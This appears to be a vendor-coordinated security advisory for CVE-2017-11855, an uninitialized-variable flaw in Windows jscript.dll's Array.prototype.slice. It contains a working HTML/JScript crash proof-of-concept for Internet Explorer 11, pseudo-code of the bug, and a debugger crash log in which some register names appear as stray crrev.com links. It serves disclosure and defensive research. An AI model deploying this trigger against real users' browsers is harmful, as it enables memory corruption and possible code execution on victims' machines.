WIndows jscript!JsArraySlice Uninitialized Variable

`Windows: Uninitialized variable in jscript!JsArraySlice   
  
CVE-2017-11855  
  
  
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:  
  
- By opening a malicious web page in Internet Explorer.  
  
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.  
  
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.  
  
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):  
  
============================================  
  
<!-- saved from url=(0014)about:internet -->  
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>  
<script language="Jscript.Encode">  
var x = new URIError(new Array(), undefined, undefined);  
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));  
Array.prototype.slice.call(1);  
</script>  
  
============================================  
  
Technical details:  
  
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).  
  
JsArraySlice looks approximately like:  
  
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {  
VAR object;  
VAR length;  
NameTbl *nametable;  
  
if(!ConvertToObject(session, this, &object, 0)) {  
//set error and return  
}  
if(!IsJSObject(&object, &nametable)) {  
//set error and return  
}  
if(nametable->GetVal(&g_sym_length, &length) < 0) {  
//set error and return   
}  
if(length->type != TYPE_INT) {  
ConvertToScalar(session, &length, &length, 3, 1);  
}  
  
...  
  
}  
  
The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).  
  
Debug log:  
  
============================================  
  
(a3c.bd8): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
jscript!InvokeDispatch+0xbd:  
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????  
  
0:014> r  
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904  
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904  
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0  
<a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=000000f42f0fb230 <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=000000f42f0fb2a0 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=0000000000000080  
<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=5555555511140000 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000000 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000  
<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=000002a7533c5a70 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000  
iopl=0 nv up ei pl zr na po nc  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
jscript!InvokeDispatch+0xbd:  
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????  
  
0:014> k  
# Child-SP RetAddr Call Site  
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd  
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f  
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51  
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f  
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a  
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135  
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87  
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0  
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a  
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135  
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580  
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60  
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb  
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f  
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d  
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8  
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265  
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b  
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239  
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56  
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8  
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d  
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4  
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267  
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf  
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181  
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50  
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a  
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32  
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70  
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1  
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40  
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c  
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251  
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9  
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274  
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac  
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7  
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4  
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16  
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89  
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14  
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21  
  
0:014> u rip  
jscript!InvokeDispatch+0xbd:  
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]  
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]  
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]  
00007ffa`e45a460c 458bc4 mov r8d,r12d  
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax  
00007ffa`e45a4614 488bd7 mov rdx,rdi  
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]  
00007ffa`e45a461b 498bce mov rcx,<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>  
  
============================================  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: ifratric  
  
`